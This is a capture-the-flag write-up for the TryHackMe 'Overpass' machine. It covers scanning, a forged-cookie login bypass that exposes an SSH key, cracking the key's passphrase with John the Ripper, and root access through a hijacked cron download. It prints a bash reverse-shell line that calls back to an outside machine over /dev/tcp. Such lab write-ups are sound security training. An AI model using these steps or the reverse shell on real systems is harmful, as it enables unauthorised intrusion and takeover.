Overpass | THM
::::What happens when some broke Comp Sci students make a password manager?::::LET'S HACK...
Let’s start with a simple Nmap scan:
nmap -sV -T4 -sC machine_IP -oN /output_scan_to_your_directory
Port 80 is open, so let’s check the website:
It’s always good practice to check the site’s source code, and here we find a comment about their security, hmm…
Next I ran directory brute-forcing against the site and got some hits, one particular subdirectory being interesting:
Exploring the directory:
Moving on to the source code, here is what I found interesting:
there are a bunch of JavaScript files, including /login.js
let’s explore it and find out:
The script checks for a cookie token and grants access based on it; as no cookie is actually generated, we can supply our own cookie matching the conditions.
++PLAYING WITH COOKIES++
Edit the cookie: name as Session token, value literally anything, with path as /.
Refresh the page and voilà, you’ve got your SSH private key.
I’m pretty sure that SSH key will prompt for a passphrase (which we don’t know),
but cracking id_rsa would work, so I’m going to crack it with
JOHN THE RIPPER
++CRACKING SSH PASSWORD++
- converting the id_rsa key into a hash:
ssh2john [your_id_rsa.key] > /hash.txt
- cracking hash.txt with John the Ripper.
Once on the box, we use a privesc enumeration tool and recon the system, looking through useful directories.
Going through every detail, we find a cron job which runs a buildscript.sh.
Now we replace the build script with our reverse shell, i.e. edit buildscript.sh
to contain a bash reverse shell from GitHub:
bash -i >& /dev/tcp/Machine_IP/8080 0>&1
As we see, the cron job runs curl on overpass.thm/downloads/src/buildscript.sh, so
we are going to create exactly the same directory structure on our local machine. Before doing this, make sure you have edited the hosts file so that overpass.thm points to our local_machine_IP.
++STARTING OUR PYTHON3 SERVER++
Start a Python HTTP server on port 80 on your local machine.
++NETCAT LISTENER++
++TAKEAWAY FROM THIS MACHINE++
This was an easy box from NinjaJc01.
It covers all the basics from enumeration to rooting the box, and even involved the OWASP Top 10. This box made sure you check out the source of each directory. Phew… finally, thanks for reading.
Feel free to send me suggestions… cheers!